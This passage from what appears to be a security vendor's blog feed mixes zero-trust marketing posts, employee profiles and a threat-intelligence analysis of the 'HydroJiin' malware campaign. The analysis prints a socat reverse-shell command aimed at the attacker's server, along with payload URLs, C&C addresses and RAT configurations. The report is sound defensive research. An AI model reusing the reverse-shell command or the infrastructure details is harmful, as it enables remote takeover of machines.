it's naïve to pretend there's any sense of honor among ransomware criminals. Whatever their methods, hackers have simple, sinister, materialistic motives. They may seek to exfiltrate data. Or lock data in place. Or demand a ransom with the promise not to destroy or release data. (By the way, that "promise" isn't worth the paper it's not printed on.) Outdated infrastructure makes for an easy target. Legacy networks, legacy security architectures, and legacy thinking all increase potential ransomware attack damage. So-called “castle-and-moat” security was designed more than a half-century ago to protect pre-internet, in-place LANs. Today, it cannot effectively secure work done outside the network perimeter. (How do you establish a boundary around the open internet?) Worse, it's relatively easy for a hacker to breach a traditional corporate network firewall. As we pundits are fond of noting, a ransomware hacker needs to get lucky just once to break through a perimeter. A hacker’s (or, more likely, a state-sponsored criminal organization’s) "luck" often comes from an unsuspecting employee clicking on an attachment in a phishing (or spear-phishing) email. Or a guessed password. Or successfully piggy-backing on a “trusted” software deployment. Once inside the “moat,” the hacker’s malware can move "east-west" through the corporate network with relative impunity, infecting (and seizing) adjacent data, systems, or applications within the castle walls. Ransomware attacks? Bad. Hackers? Evil. Now that that’s settled… It's cheap for a hacker to launch a ransomware attack. It's expensive for an enterprise to recover from one. For hackers, ransomware is easy and lucrative. They are launching more-sophisticated attacks and developing more complex business models. Some hacking groups even offer "Ransomware-as-a-service" kits to recruit new attackers. Their attacks have also become more destructive: Some hackers double-down on monetizing criminality, demanding a ransom to "unlock" an enterprise's encrypted data, and then demanding another payment not to auction that same proprietary information off to the highest bidder on the dark web. (Oh, and then they might destroy the data anyway. Gentlemen thieves, indeed.) Want to prepare for ransomware? Adopt zero trust. If we really want to do something about ransomware threats—something more meaningful than stocking up on digital currency to facilitate payment to the next Sandworm—we must remove hackers’ incentives. How can ransomware be made less rewarding for cyber-criminals? We can't devalue proprietary assets. But we can make those assets—data, applications, systems—more difficult (if not impossible) for hackers to seize. Hackers attack what they can see. Most enterprises still expose IP addresses to the open internet. Each publicly-visible IP address represents a potential attack vector. In a legacy network environment, cloud apps can also introduce risk: Publishing apps to the public cloud using a traditional firewall advertises those apps to hackers, increasing an organization's attackable surface. There are two ways to disincentivize ransomware attacks: Obscure enterprise attack surface and eliminate lateral movement. Both can be achieved with the adoption of a Zero Trust Architecture (ZTA). ZTAs supplant the traditional network model, replacing it with ephemeral, direct connectivity, be it user-to-app, user-to-datacenter, or app-to-app. Security is policy-based, specific to user, proxied, and delivered inline via cloud-edge service. Nothing—and I mean nothing—is visible to the outside world. ZTA eliminates east-west travel risk: Without a traditional MPLS network to navigate, a hacker—even one who successfully breaches a single endpoint—cannot infect proximate systems. Take away navigability to other destinations and there’s no internal path for hackers to travel, no corporate lucre to plunder, and no reason to attack. We can never take threats or threat adversaries for granted. We all must prepare for ransomware. But ransomware preparation should not assume its inevitability. CXOs who stick with “the way we’ve always done things” put their organizations at unnecessary risk, and open their doors to cyberattack. We can all aim higher than a “So-you’ve-been-hacked” pamphlet. We can move from “preparing for ransomware” to preventing it...with a Zero Trust Architecture. Mon, 22 Mar 2021 10:28:07 -0700 Toph Whitmore Zscaler Recognized as a Microsoft Security 20/20 Partner Awards Finalist for Zero Trust Champion and Security ISV of the Year This week, Microsoft announced that it had chosen its Microsoft Security 20/20 Partner Awards Finalists for the year, a prestigious classification in the Microsoft partner community. I am honored to announce that Zscaler has been chosen as a finalist in two categories: Security ISV of the Year (which Zscaler won last year); and Zero Trust Champion – ISV These nominations validate and underscore Zscaler’s approach to delivering the best and most secure digital experience for our customers. Together with Microsoft, we have secured thousands of enterprises, from major industrial companies such as GE and Siemens, to leading consumer brands including L’Oréal. In total, we have more than 3,000 joint customers that benefit from our seven deep integrations across Microsoft 365 and Azure involving key programs and technologies in support of the zero-trust journey. I would be remiss without thanking our customers for joining us in this journey. The past year has been difficult—to say the least—and our collaboration with Microsoft has shown time and time again what having two innovative companies working together can create. To demonstrate this point, I’m going to share two quick stories, the theme of which you are likely familiar with, but each with an ending that speaks of triumph, innovation, and poise. Racing to get the workforce remote: Zscaler + Microsoft 365 Nearly a year ago to the day, many of us received notice that work wasn’t going to be in the office for some time due to the COVID-19 pandemic. Putting technical hurdles aside for a moment, a question that arose for many enterprises around the world was, “How are we going to get our work done?” With so much of the world using enterprise business and productivity apps on-prem and in the cloud to communicate, organize, write, present, calculate, exchange files, etc, there was no time to waste. People had to go home, but work couldn’t grind to a halt. IT leaders had a lot to think about. “Is my network going to hold up? Does everyone have the access to the apps they need? Is my security for remote workers enough? What do I need to implement to handle growing traffic needs and new attack surfaces?” It became evident nearly overnight that the network architectures of the past had run their course. It was time to try something new, something innovative for the new work-from-home reality. Johnson Controls: 100,000+ office workers required to go remote Johnson Controls is a large, multinational corporation that specializes in the production of HVAC, fire, and security systems for buildings. When the pandemic hit and workers needed to become remote, Johnson Controls turned to Zscaler and Microsoft to alleviate pains with legacy VPNs that became impossible to scale and hurt the user experience. In three weeks, Johnson Controls was able to overcome VPN capacity limitation constraints using Zscaler Private Access and Azure AD, which easily scaled automatically to meet user needs, while significantly improving the end-user experience and implementing a zero trust app access solution. Johnson Controls was able to transform how work was done in a matter of weeks to meet a changing world. DB Schenker: Local internet breakouts for 1,400 branch locations in 80+ countries DB Schenker is a large European-based logistics company with more than 75,000 employees in 80+ countries. DB Schenker looked to Zscaler to enable its move to a SASE architecture that enabled cloud-based applications—including Microsoft 365—and removed IT complexity for branch locations. Together, we: Moved to Microsoft 365 cloud services in 80+ countries Removed appliances and enabled direct-to-internet connections for 1,400 branch locations Created 40,000 “home locations” with direct internet and SaaS access due to COVID-19 mandates Allowed critical, every-day collaboration via Microsoft Teams touching 75,000 employees It’s stories like these that make our collaboration so powerful and unique. When customers need to solve the world’s most pressing IT problems, they can turn to Zscaler and Microsoft. Zero trust is not a nice-to-have, it’s fundamental to digital transformation This is the first year that Microsoft has a Zero Trust Champion award, and we’re extremely proud to be nominated. Zscaler is committed to helping our customers accelerate digital transformation with a focus on zero trust. The Zscaler Zero Trust Exchange, the platform that powers all Zscaler services, is uniquely positioned to protect a changing, hyperconnected yet dispersed world. Business is taking place off your trusted corporate network and outside your security perimeter. Apps now live both in your data center and the cloud Users are connecting from everywhere using a variety of devices Server, IoT, and OT traffic is growing exponentially The internet is the new connectivity layer Zscaler’s Zero Trust Exchange is a cloud-native platform that securely connects users, apps, and devices over any network, in any location, using business policies to increase user productivity, reduce business risk, slash costs, and simplify IT. Together with Microsoft, we’ll continue our stewardship of digital transformation built on zero trust principles. Don’t forget to check out Microsoft Security 20/20 Again, we want to thank Microsoft for the company’s continued collaboration with Zscaler. Our commitment to our joint customers remains steadfast as we expand our integrations across Microsoft’s suites of products, and we stand ready to take on the toughest IT challenges the world has to offer. The second annual Microsoft Security 20/20 awards will celebrate finalists in 18 categories spanning security, compliance, and identity. Microsoft will be unveiling the winners of the Microsoft Security 20/20 Partner Awards, voted on by a group of industry veterans, on May 12, 2021. Wed, 17 Mar 2021 16:22:06 -0700 Punit Minocha Celebrating Women at Zscaler: Nicole Martinez on Influential Women and Giving Back In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Nicole Martinez joined Zscaler in 2016 and is currently Manager, Cloud Operations Platform Programs at the company. Throughout her career journey, she has seen significant technological evolution, learned important lessons about navigating tech as a woman, and dedicated herself to encouraging and empowering women in the industry. “I started my journey in technology many years ago directly out of college working in IT support,” she said. “I worked for a female executive who led her team with grace and encouraged the growth and development of all her employees.” “I've carried with me the grace and patience of that first female leader I had at the start of my career,” she said. “She taught me that even if you don't know how to do something, don't let that stop you—dive in and explore every opportunity, find your interest, and learn all you can about it. I've also learned that it's OK to be thought of as nice or ‘the quiet one.’ You don't have to be the loudest voice in the room to make the biggest impact.” “Technology is constantly changing and we should be changing with it, growing, and exploring,” she said. “I choose to continue to support the growth and opportunities in tech for women by always being supportive of other women and sharing what I’ve learned in my journey.” Q: What are you most proud of in your career? A: Building a team from the ground up, of which two-thirds are women. Q: What advice do you have for women wanting to get into tech? A: Do it, educate yourself, seek the knowledge, and take the leap. It's very rewarding to see the impact of your work in the world. Q: What professional advice would you give your younger self? A: It's going to be OK, say yes when opportunity presents itself. If you make a mistake, learn from it. Q: Who was your greatest inspiration when you were growing up and why? A: My mom. She was always supportive and from a very young age she told me I could do anything if I apply myself, work hard, and never give up. Q: What do you like to do outside of work? A: Help others. I sit on the board of a non-profit that provides services to Veterans and others in need. We do this by pairing them with Service Dogs taken from shelters and rescues. I am a founding member of this non-profit and we are celebrating our 10 year anniversary this year. For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: Wendi Lester and Marina Ayton Celebrating Women at Zscaler: Diana Vikutan on Developing Zscaler and Honing Multitasking Skills During Quarantine Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Thu, 18 Mar 2021 08:00:01 -0700 Kristi Myllenbeck No More Security vs. User Experience: How a Zoom Meeting Transformed our Entire Network This post also appeared on LinkedIn. In November of 2019 (back before the pandemic lockdown), I was the CISO for an international professional services organization. My most important strategic project at that time was creating the “always-on VPN.” What was this top-tier objective? An attempt to modernize our global secure remote access. Why? With our old systems, it was too much effort to access company assets from outside the security perimeter, and we expected to grow as more people worked outside the office. (Little did we know...) My CIO and I identified four important pain points the always-on VPN had to relieve: Inconvenience: Reduce login complexity to just a single sign-on (SSO) service for any device, anywhere to improve the user experience. Threat risk: Reduce attack surface as the number of people outside the security perimeter increased. Poor performance: Reduce traffic backhauled traffic to our data centers via MPLS connections to improve the user experience. High overhead: Reduce MPLS backhaul expenses by using direct internet connections. We had different ideas about what was most important and what to do first. But we both agreed that our current architecture wasn’t going to support our move into a cloud-first, remote environment. The recurring dilemma: user experience or enterprise security My CIO questioned our approach to remote access: “Why do I have to authenticate to a company laptop, launch a VPN client, provide my network password again, enable my soft multi-factor authentication (MFA) token, and manually input an 8-digit rotating authenticator just to connect to the business network?” Our tedious network-security login workflow contributed to a terrible user experience and was so onerous it made employees want to avoid security. The problem was further compounded by other services employees regularly use—banking, social media, and e-commerce, for example—requiring additional multi-factor authentication (MFA) push notifications to registered or authorized devices. I agreed with his user experience concerns. I also wanted to reduce the number of inbound VPN listener services (three) and VDI gateways (two) running in three different continental DMZs. There had been several well-publicized VPN concentrator exploits that required emergency patches or updates around this same time. Updates like this needed to be tested and reviewed for operational impact, which meant a longer time for both implementation and network risk exposure. Turns out these two issues were connected. O365 broke us We backhauled all of our United States remote traffic to a VPN concentrator at a colocation data center in Phoenix, Arizona. (The London and Beijing data centers had similar setups in Europe and Asia, respectively.). Our 2019 strategic plan was to adopt Office 365 via an Azure tenant. A business-impact assessment suggested that our road-warrior traffic (already trending up) would grow exponentially with increased use of Office 365 apps like SharePoint, OneDrive, Teams, and Skype. If every eligible remote worker in the US went on the road simultaneously, all internet and Office 365 traffic would be backhauled to Phoenix and then sent to the Los Angeles service edge before heading for its real destination—the cloud. Our O365 data traveled a circuitous route across multiple networks, slowing app performance. We had to figure out how to improve Office 365 performance. One option was to implement a split-tunnel solution, but the lack of device, traffic, and network visibility heightened risk far beyond our appetite. We needed a way to separate internet-bound traffic from internal-application bound traffic. Zero trust shows us the way Zero trust wasn’t new to me: we had used a cloud secure web gateway (SWG) for years to address threats and security objectives. The SWG excelled at inspecting outbound traffic for threats and data loss, and seamlessly secured all of our business SaaS tenants. It also offered the best visibility into outbound traffic behavior and usage metrics I’d ever experienced. So I thought, “Can we use this model for inbound private cloud traffic using zero trust?” (Spoiler alert: Yes. Yes we can.) Zero trust is a new paradigm, and it requires a fundamental change in connectivity mindset. Legacy castle-and-moat security practitioners ask, “How do I securely connect this device to this network?” Zero trust is more direct (in more ways than one), and asks “How do I securely connect this user to this application?” In 2019, Gartner defined the practical implementation of zero trust as “Zero Trust Network Access,” or ZTNA: ZTNA, also known as the software-defined perimeter (SDP), is a set of technologies that operates on an adaptive trust model, where trust is never implicit, and access is granted on a “need-to-know,” least-privileged basis defined by granular policies.* We deployed a network connector and set up a straightforward entitlement configuration for user provisioning. In other words: No new endpoint software deployment and installation. Now we could replace our VPN solution with a Zero Trust solution, and reduce our attack surface across all users. Added benefit: We immediately discovered half a dozen hidden “shadow IT” servers. Fortunately, they were properly maintained and patched via automation, but until ZTNA, nobody knew who used them or what they were for. The big change: COVID-19 By February 2020, we were ready to deploy zero trust across the whole enterprise. Then COVID-19 shut down the world. We faced several obstacles to a successful pivot to remote work. Around 20% of our workforce had never worked remotely: no business laptop, no MFA token, no knowledge of BYOD application management practices. All IT resources went towards adding licensing and infrastructure to our VDI environment. As we stabilized our remote workforce, our 2019 business impact assessment became a reality. The explosion of Zoom, Teams, and Bluejeans web conferencing saturated our U.S. VPN gateway bandwidth. Rolling out zero trust alleviated that pain, and addressed user experience and security in a single solution. The zero trust footnote: Why is my meeting quality bad? After we’d dealt with keeping employees safe during the COVID-19 crisis, I was gung-ho for moving fully forward with a Zero Trust infrastructure for the entire company. But our CIO and I had a difference of opinion on where to take Zero Trust. I wanted to push it further and use it to enable direct internet connections to our cloud applications and assets, while he felt that might introduce too much change for employees during the pandemic. But oddly enough, in April 2020 our CEO called a meeting. The CEO and his wife had concurrent Zoom calls, each with a similar number of participants. The CEO’s online meeting suffered continual audio and video drops. But his wife’s call ran with great sound and video. Why was this happening? What’s the problem? The issue was exactly what the CIO and I had discussed a week earlier: backhauling. Our CEO’s web-conferencing traffic was routing through his home network in Washington, D.C., out to our Phoenix data center, and then to the Zscaler service edge in Los Angeles—all before connecting to the Zoom infrastructure. As for his wife’s call, well, we can make the simple assumption that her device traffic went directly through their local gateway. As I told the CIO: “You can fix this with direct internet connections—using zero trust.” This meeting with the CEO triggered our global zero trust user deployment—a happy ending! Thu, 18 Mar 2021 08:00:01 -0700 Brad Moldenhauer Celebrating Women at Zscaler: Wendi Lester and Marina Ayton In honor of Women’s History Month and International Women’s Day on March 8, we’re recognizing influential women at Zscaler who have made a significant impact within their careers, teams, and on the Zscaler family as a whole. Marina Ayton has been at Zscaler for a year and a half and currently serves as a Regional Director for the UK team. Her career journey has been eventful and fast-paced, and she hopes to continue that success in the coming years while mentoring and fostering career growth in others. “The thing I'm most proud about in my career has probably been my progression over a short amount of time. I have been promoted about eight times in the last six years,” she said. “And I think just the nature of working for a high-growth company that operates on a totally meritocratic basis gives you a huge opportunity to grow.” “I would say that recently, my complete career highlight has been having the opportunity to become a leader,” she said. “And with that comes a huge responsibility, right? To help train, and develop all of this talent—high potential, incredible individuals—to support them on their next phase of growth.” “I think my favorite thing about working in technology and for a company like Zscaler is the environment that's built around it,” she said. “We have this incredible culture of excellence, which has been developed, which gives you this kind of huge feeling of pride as you're working alongside some of the industry's best and top performers. Outside of work, Marina enjoys being in the outdoors skiing and playing tennis and squash. She also sits on the board of the Prince's Trust RISE program, which is a youth charity that helps young people aged 11 to 30 get into jobs, education, and training. Wendi Lester began her journey at Zscaler in February 2020 and is currently the Director of Global Real Estate and Workplace Operations. She has served as a mentor to many and believes in the power of personal connections to succeed and build a career you love. “What I am most proud of in my career is the people that I've mentored and worked with that have grown and matured and become leaders at other multinational companies,” she said. “The advice I would give to women who want to get into tech is: be brave and be willing to network and be willing to get out there, try something new, and to want to engage with people, because it's through building relationships and networking that you will find your best success,” she said. “And you will be able to find advocates, and you'll be able to find people that you can mentor, and that will be very fulfilling in your career.” For more about how Zscaler is celebrating International Women's Day and Women's History Month, read this blog: Fostering Corporate Inclusivity: Honoring Zscaler Leaders on International Women’s Day. Further reading: Celebrating Women at Zscaler: How Jey Govindan Empowers Future Generations of Women in Tech Celebrating Women at Zscaler: Sandi Lurie and Karen Mayerik Celebrating Women at Zscaler: Melissa Balentine on Professional Growth and the Evolution of Zscaler Wed, 17 Mar 2021 08:00:01 -0700 Kristi Myllenbeck A look at HydroJiin campaign Zscaler ThreatLabZ recently came across an interesting campaign involving multiple infostealer RAT families and miner malware. We’ve dubbed the campaign “HydroJiin” based on aliases used by the threat actor. The threat actor is in the business of selling malware, and lurks around in online forums that are common hangouts for neophyte to mid-level cyber criminals. We speculate that the malware author is running widespread campaigns involving different commodity and custom malware to steal information to sell in underground marketplaces. Similar to other attacks outlined in the recent ThreatLabZ State of Encrypted Attacks report, this campaign serves as yet another example of the importance of continuous SSL inspection and zero trust policies to prevent initial compromise as well as communication back to C&C servers. While we do not know the impact of this particular campaign, this type of malware is for sale on underground markets to any number of prospective cybercriminals. While not highly sophisticated, this campaign uses a number of different techniques in order to increase chances of successfully infiltrating organizations who do not take proper precautions. This campaign utilizes a variety of payloads and infection vectors from commodity RATs to custom malware, email spam, backdooring/masquerading as cracked software, and other lures. Listed below are some of the unique aspects of this campaign: Multilevel infection chain of payloads leading from one to the next Custom python-based backdoor deployed along with other RATs (Netwired and Quasar) Python backdoor command checking for MacOS indicating possibility of more cross-platform functionality in the future. Campaign is related to a threat actor who is also involved in distribution of multiple malicious tools via a dedicated malware e-commerce website Possibility of backdoored malware payload similar to CobianRAT case Not rare, but heavy use of pastebin to host encoded payloads Infection chain Figure 1: Infection Chain The infection starts with the delivery of a downloader that downloads multiple payloads. We could not confirm the delivery vector of this downloader but in we suspect the use of spam emails and cracked software as we have seen in earlier campaigns. Once the attackers achieve initial compromise, the downloader downloads three files: Injector - Used as a loader to inject downloaded payloads into legitimate processes. Netwired RAT - A commodity RAT malware used to control the infected system and steal information. DownloaderShellcode - Obfuscated Meterpreter-based shellcode to download further payloads. A Pyrome python backdoor is downloaded by this shellcode. This will also download socat and xmrig miner, and finally xmrig miner downloads another RAT named Quasar. Each payload and its functionality is explained below. 1 Analysis of downloader payload First, the downloader downloads a payload from pastebin and saves to %TEMP% path, with randomly generated names. The payload hosted on pastebin is encoded in base64 with the text string reversed. Figure 2: Downloading encoded payload from pastebin The downloaded malware is an injector. It downloads two more payloads and passes an argument to the first payload for injection. Figure 3: Passing payloads to injector Payloads are then downloaded from: xmr-services[.]com/C/ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt - Shellcode Downloader pastebin[.]com/raw/G0jcGs79 - NetwiredRC The payloads are also similarly string reversed after base64 encoding. 1.1 NetWiredRC The second payload in this case, hosted on pastebin, is a commodity malware known as NetWiredRC. NetWiredRC is a publicly available RAT sold by World Wired Labs, active since at least 2012. Adversaries often use spam mails and phishing emails to distribute NetWiredRC. In the wild, it has been seen that NetWireRC is also used by APT threat actors. Netwired’s main focus is to gain unauthorized control on the victim machine, steal stored credentials, and perform keylogging activity. This malware has had multiple version updates with bug fixes and new functionality. This sample will communicate with beltalus.ns1[.]name:8084 for further commands. Configuration extracted from Netwire RAT:: {'Domains': ['beltalus.ns1[.]name:8084'], 'Proxy Server': 'Not Configured', 'Password': b'Volve', 'Host ID': b'Loader-%Rand%', 'Mutex': b'mKsWHTbK', 'Install Path': b'-', 'Startup Name': b'-', 'ActiveX Key': b'-', 'KeyLog Dir': b'%AppData%\\Logs_temp\\', 'Proxy Option': 'Direct connection', 'Copy executable': False, 'Delete original': False, 'Lock executable': False, 'Registry autorun': False, 'ActiveX autorun': False, 'Use a mutex': True, 'Offline keylogger': True} 1.2 Shellcode Downloader The first of the two downloaded payloads is a Metasploit Shikata Ga Nai Encoder encoded shellcode capable of downloading another payload from: r3clama[.]com/files/chrome.exe. PDB path embedded inside binary: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb The shellcode downloader downloads the following payloads: r3clama[.]com/files/ : Socat tool r3clama[.]com/files/services.exe : Miner Dropper 1.2.1 PyInstaller Payload The payload downloaded from r3clama[.]com is a Python-based malware bundled using pyinstaller. Capabilities of this payload include: Persistence using Run key. Download, save and extract from https://r3clama[.]com/files/ Download monero miner exe from https://r3clama[.]com/files/services.exe which runs and further downloads QuasarRAT. Start network communication thread. Figure 4 : Configuration settings of malware Network Communication The malware next communicates with C&C server at IP '193.218.118[.]190' and port 8266, first by sending a key to the server and then waiting for .json commands. Commands supported by this malware include: w0rm url upload Figure 5 : Commands support by python backdoor Command 'url' and 'upload' Both url and upload commands are supported only for Windows OS—on any other platform these commands are ignored. Each of these commands is basically the same, and will download and save a payload from specified url. Files are saved under a newly created directory under %temp% with 16-character random names. There are only two differences: In the case of upload, the downloaded file is saved at %temp%/upload and in case of url the file is saved at %temp%/userbin. The url command also executes the file in addition to downloading it while the upload command does not. Command 'w0rm' The w0rm command is supported on two platforms - Windows and MacOS. On receipt of this command, socat runs with following command line: "socat OPENSSL:193[.]218[.]118[.]190:4442,verify=0 EXEC:{OS Command}" OS Command Windows : 'cmd.exe',pipes MacOS : /bin/bash And sends hostname+’$>’ back to C&C over socket. In short, this command provides a reverse shell on the system to the attacker through socat. Socat Socat is an advanced multipurpose data relay tool. It supports a plethora of protocols. Below is the description from its creators: “socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.” - README Miner Dropper This is again a .Net based malware. It includes a monero miner binary and all the dll dependencies required by a monero miner executable. It will drop and run the miner payload. Then, it downloads and runs an additional payload, again from pastebin. Here is the Miner Dropper sequence: Installs miner executable and dependency files. Figure 6: Installing xmrig miner dependency files Waits for idle before starting miner. Figure 7: Checks if system is Idle before starting miner CheckActive checks if the miner process is already running, if not then it is started by StartFiles. Figure 8: Running miner executable with required arguments. Downloads Quasar RAT payload from (https://pastebin[.]com/raw/khzLqKyN) after starting miner: Figure 9: Downloading another payload(QuasarRAT) This miner could be the MinerGate Silent Miner sold on the threat actor’s malware shop. If our assumption is true, there is another possibility of that miner being backdoored, similar to an old case of Cobian RAT, piggybacking on client malware operators to distribute his own RATs. Unfortunately, it is not possible to assert the assumption without access to the builder. QuasarRAT QuasarRAT has been active since at least 2015. Quasar is an open-source project written in .Net framework and freely available to the public. This means anyone can take the code and use it freely, with or without modification. Hence, this malware has become quite popular among cyber criminals. It has been used in various campaigns from mass spam campaigns to targeted attacks. The sample used in this campaign was version 1.3, which has been used in a number of past campaigns. Configuration of QuasarRAT Version: "" C&C : "beltalus.ns1[.]name:8082;" Filename: "Client.exe" Mutex: "QSR_MUTEX_NJPXiF1GKqO6Y3uwjn" The C&C address used to control the Python backdoor and socat reverse shell is historically known to host C&C servers for many other malwares. Here is list of some malware and corresponding ports used to host C&C servers in the past: IP Port Malware 8266 Python backdoor 4442 Socat listener OPENSSL 1111 NjRAT 2407 QuasarRAT 8050 Nanocore Threat Actor HydroJiin We believe this campaign is run by a threat actor known by the aliases ‘Hydro’ and ‘JiiN’. The threat actor is active on forums such as hackforums[.]net since 2010 and on YouTube at least since 2007. Initially the actor was involved with game mods and cracks, and eventually moved into malware space. We, with high confidence, believe that this actor is from a French-speaking region. By the other alias JiiN, the threat actor runs a malware shop called JiiN shop at “xmr-services[.]com”. Based on the two aliases, we are calling this campaign and actor HydroJiin. We are attributing this campaign to HydroJiin with high confidence due to following reasons: JiiN shop(Xmr-services) is used in this campaign. JiiN shop(Xmr-services) sells malware tools which Hydro makes videos about. This campaign downloads an encrypted payload from paste by user Hydro59. All of the above indicates the relation between HydroJiin, this campaign, and xmr-services. Malware Shop The website called “JiiN shop” is based on the username of malware developer/seller and hosted at “xmr-services[.]com.” It is used to advertise and sell different malware products. The threat actor is using https://shoppy[.]gg for handling cryptocurrency payments. He is also selling some additional stuff on shoppy. Figure 10: JiiN Shop Malware sold on this website includes: Minergate silent miner - A configurable miner tool to mine multiple cryptocurrencies on CPU or GPU hidden from the user. Comes with a builder with options for obfuscation, persistence, etc. Coak Crypter - As the name implies, a packer tool to obfuscate other malware to make them undetectable. NiiJ Stealer - A very basic stealer to steal passwords from popular tools like Firefox, Opera, Chrome, FileZilla, etc and send to the C&C panel. INK Exploit - Claims to make malware FUD, but provides no details about the specific exploit. The Campaign The infection cycle and malware payloads discussed above are just a part of an ongoing campaign. The campaign has been going on since at least September 29th, 2020. The source website for this campaign is also serving other payloads which led us to more domains and payloads. Covering the whole campaign is out of scope for this blog post. But we are providing some details we have noticed. And a non-exhaustive list of malicious websites serving malwares, C&C domains is also included in the IoC section. Most of the domains as well as served file names follow a pattern. Domains are mostly registered using namecheap. Domain Pattern: [a-z]{4,8}\d{2,4}[a-z]{0,2}.xyz E.g pzazmrserv194[.]xyz mpzskdfadvert329[.]xyz hklkxadvert475[.]xyz Zgkstarserver17km[.]xyz Filename pattern example Malware Family atx111.exe SmokeLoader socks111.exe SystemBC tau111.exe Tauras Stealer lkx111 Roger Ransomware lb777 Lockbit ransomware void.exe Downloader desk Anydesk Conclusion The threat actor HydroJiin has been in the malware business for some time now. He is selling multiple malware types along with running his own campaigns. The malware payload download stats from pastebin indicate he is having decent success. This actor might not be highly advanced but he is persistent in his efforts by using various tools, techniques, and methods to increase his chances of success. SSL inspection is advisable to detect and block such threats using SSL to hide their malicious intent. We at ZScaler ThreatLabZ continue to monitor, and strive to protect our customers from, all levels of threats. Detection Figure 11: Zscaler Cloud sandbox report flagging malware In addition to sandbox detections, the Zscaler Cloud Security Platform detects indicators at various levels: Win32.Backdoor.NetWiredRC Win32.Downloader.NetWiredRC Win32.Backdoor.QuasarRAT Win32.Coinminer.Xmrig Win32.Downloader.MiniInject Win32.Downloader.Pyrome MITRE ATT&CK ID Tactic Technique T1059 Command and Scripting Interpreter: Windows Command Shell Execute reverse shell commands T1555 Credentials from Password Stores Mentioned RAT functionality T1573 Encrypted Channel: Symmetric Cryptography Encrypt the communication between the victim and the remote machine T1105 Ingress Tool Transfer Downloads the Miner and RAT on the victim machine T1056 Input Capture: Keylogging Mentioned RAT functionality T1112 Modify Registry Modify Run entry in registry T1090 Proxy Quasar uses SOCKS5 to communicate over a reverse proxy T1021 Remote Services: Remote Desktop Protocol Quasar module to perform remote desktop access T1053 Scheduled Task/Job: Scheduled Task Establish persistence by creating new schtasks T1082 System Information Discovery Quasar and NETWIRE both RAT having this feature to discover and collect victim machine information. T1125 Video Capture Mentioned RAT functionality T1113 Screen Capture Mentioned RAT functionality T1132 Data Encoding Downloaded Base64 encoded file T1496 Resource Hijacking Install XMRig Miner on victim machine T1027 Obfuscated Files or Information XOR operation is implemented to decrypt the file IOCs Filename Md5 Malware Void.exe [ parent file] 656951fa7b57355b58075b3c06232b01 Win32.Downloader.MiniInject ABAGFBBEBDBCDBFCAEGBEEBAAB_B__DFECBAGGDEBEFD_EDCCBAEFEE.txt 9c50501b6f68921cafed8af6f6688fed Win32.Downloader.NetWiredRC chrome.exe 294fd63ebaae4d2e8c741003776488c2 Win32.Downloader.Pyrome Service.exe e9bccc96597cc96d22b85010d7fa3004 Win32.Coinminer.Xmrig khzLqKyN 3bb3340bccdab8cde94dd1bf105e1d3e Win32.Backdoor.QuasarRAT G0jcGs79 F094D8C0D9E6766BCCF78DA49AAB3CBC Win32.Backdoor.NetWiredRC URLs Malware gzlkmcserv437[.]xyz/void.exe Win32.Downloader.MiniInject r3clama[.]com/files/ Socat tool r3clama[.]com/files/services.exe Win32.Coinminer.Xmrig pastebin[.]com/raw/khzlqkyn Win32.Backdoor.QuasarRAT pastebin[.]com/raw/G0jcGs79 Win32.Backdoor.NetWiredRC C&C: C&C Malware beltalus.ns1[.]name:8084' NetWiredRC 82.65.58[.]129 NetWiredRC xmr.pool.minergate[.]com XMRIG Miner beltalus.ns1[.]name:8082 QuasarRAT 193.218.118[.]190:8266 Pyrome backdoor 193.218.118[.]190:4442 Socat 193.218.118[.]190:8266 Python backdoor 193.218.118[.]190:4442 Socat listener OPENSSL 193.218.118[.]190:1111 NjRAT 193.218.118[.]190:2407 QuasarRAT 193.218.118[.]190:8050 Nanocore Wed, 14 Apr 2021 16:42:11 -0700 Atinderpal Singh How to Describe the Goals of Microsegmentation Network segmentation has been a recommended network security practice for many years. The concept of segmenting a network into small chunks grew from the need to provide processing speed and power, uptime, and availability of network resources. Years later, security architects recognized how this idea of segmentation could also be beneficial from a cybersecurity standpoint. Somewhere along the line, as network segmentation evolved into microsegmentation, features became fused with benefits, and the endgame was distorted as vendors vied to position their technologies as the very best microsegmentation solution on the market. This only served to pile on confusion for end users who tried to implement microsegmentation but abandoned ship when it became too complex and didn’t deliver expected results. Now, one might argue that the endgame of microsegmentation is pretty clear: breaking down a large, sprawling network into manageable bits. But is that explanation enough to sell your executive team on the thousands of dollars and hundreds of hours it takes to evaluate, implement, and manage a microsegmentation program? Probably not. Particularly not when using traditional methods of microsegmentation that use legacy tooling, which is kludgy and was originally designed to protect the perimeter, meaning that the benefits are counterbalanced by the challenges of retrofitting an “outside” security control for internal network purposes. Why do microsegmentation vs. how to do microsegmentation As I sit at my desk and contemplate how to explain the benefits of microsegmentation, I find it’s helpful to fall back on non-security examples that everyone can relate to. After all, no two security or networking programs are the same and no two organizations have carbon copy business requirements, data, or systems that influence how microsegmentation is accomplished. Yet most people can relate to examples taken from daily life. If you’re the security or infrastructure person trying to garner non-techie budget and/or support for a microsegmentation project, focusing on the “why”—in simple terms, as opposed to “you can restrict this host from talking to that server”—can be extremely useful. In security’s view, the goal of microsegmentation is to implement fine-grained control across collections of hosts, servers, databases, applications, etc., which prevent attackers from exploiting an entire network once they’ve compromised one endpoint, user, or other vulnerability. However, that doesn’t sound super sexy or make mountains of money appear from the CFO’s coffers. The business benefit can be inferred, but it’s neither explicitly stated nor easily understood if networking isn’t one’s gig. It’s also helpful to separate the “how” from the “why,” or the features from the benefits. Focused security efforts For our first example, let’s pretend you’re driving from Boston to 